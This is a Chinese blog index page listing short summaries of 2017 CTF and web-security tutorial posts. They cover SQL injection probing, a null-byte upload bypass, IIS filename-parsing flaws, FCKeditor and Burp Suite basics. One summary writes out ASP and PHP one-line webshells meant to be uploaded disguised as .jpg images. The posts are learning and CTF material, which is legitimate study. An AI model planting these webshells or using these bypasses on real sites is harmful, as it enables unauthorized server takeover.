摘要: 链接: http://ctf5.shiyanbar.com/8/index.php?id=1 方法:sql注入(php+MySQL) 1.首先判断是否是注入点 http://ctf5.shiyanbar.com/8/index.php?id=1 and1=1 http://ctf5.shiyanba 阅读全文
posted @ 2017-10-22 21:23 pipiforever 阅读(1408) 评论(0) 推荐(0) 编辑
摘要: 链接:http://ctf5.shiyanbar.com/web/upload 方法:利用0x00截断原理 1.首先随便上传一张图片,会显示后缀需要.php文件 通过burpsuite改文件类型为 ma.php,显示 这个时候就想到用0x00截断 上传一张图片,在/uploads/后面加上一个1.p 阅读全文
posted @ 2017-10-22 11:49 pipiforever 阅读(1943) 评论(0) 推荐(0) 编辑
摘要: 常见网页编辑器 FCKeditor,Ewebeditor优点:不需要进入网站后台以FCKeditor为例:配置:(ps:按我说的做就行了,就不放图了) 1.在虚拟机中下载FCKeditor,放在wwwroot目录下 2.右键属性,在安全中设置来宾用户的读取,写入,运行权限 3.打开fckeditor 阅读全文
posted @ 2017-10-21 16:13 pipiforever 阅读(1146) 评论(0) 推荐(0) 编辑
摘要: IIS解析漏洞1.如果一个目录以"xxx.asp"的形式命名,那么该目录下的所有类型文件都会被当做asp文件来进行解析执行2.如果一个文件的扩展名采用".asp;*.jpg"的形式,那么该文件也会被当做asp文件解析执行 *随便些什么 ,也可以不写原理:IIS识别不出后缀,默认用第一个后缀本地搭建I 阅读全文
posted @ 2017-10-21 14:14 pipiforever 阅读(8781) 评论(0) 推荐(0) 编辑
摘要: 前提:已经登入了网站的后台1.在后台中找到一个可以上传文件的地方 (一些上传图片的地方)2.在本机中写一个一句话木马 后缀用.jpg asp: <%eval request("pass")%> pass 为自己设定的密码 php: <?php @eval($_POST[ 'pass' ]);?>3. 阅读全文
posted @ 2017-10-20 21:35 pipiforever 阅读(774) 评论(0) 推荐(0) 编辑
摘要: 主要功能: burp suite 可以将客户端与服务器之间传输的数据进行拦截,然后对数据进行修改并在此发送,从而完成攻击设置代理服务器 Proxy/Options/listeners中,可设置默认的监听IP地址的端口号 建议用Firefox 或ChromeIE内核不同的浏览器burp suite 也 阅读全文
posted @ 2017-10-20 21:13 pipiforever 阅读(930) 评论(0) 推荐(0) 编辑
摘要: 第一个签到题就不用说了,直接加群看公告 1.打开链接,查看源文件 这里直接就可以看到flag了 那个文件上传的直接上传一个php文件就行了 点进去发现是一个验证码,当时我就觉得这太简单了,当输入时发现只能输入一位 然后查看源代码,并没有看见flag,然后上网查了一下发现里面的JS可以展开(用火狐浏览 阅读全文
posted @ 2017-09-18 23:20 pipiforever 阅读(697) 评论(0) 推荐(0) 编辑
摘要: 1.首先打开这个图片 2.用记事本打开这个图片 3.发现文件的结果有一段unicode代码,然后通过在线转码 转换成ASCII码 第一个CFT题就这样解决了O(∩_∩)O 阅读全文
posted @ 2017-09-18 22:53 pipiforever 阅读(188) 评论(0) 推荐(0) 编辑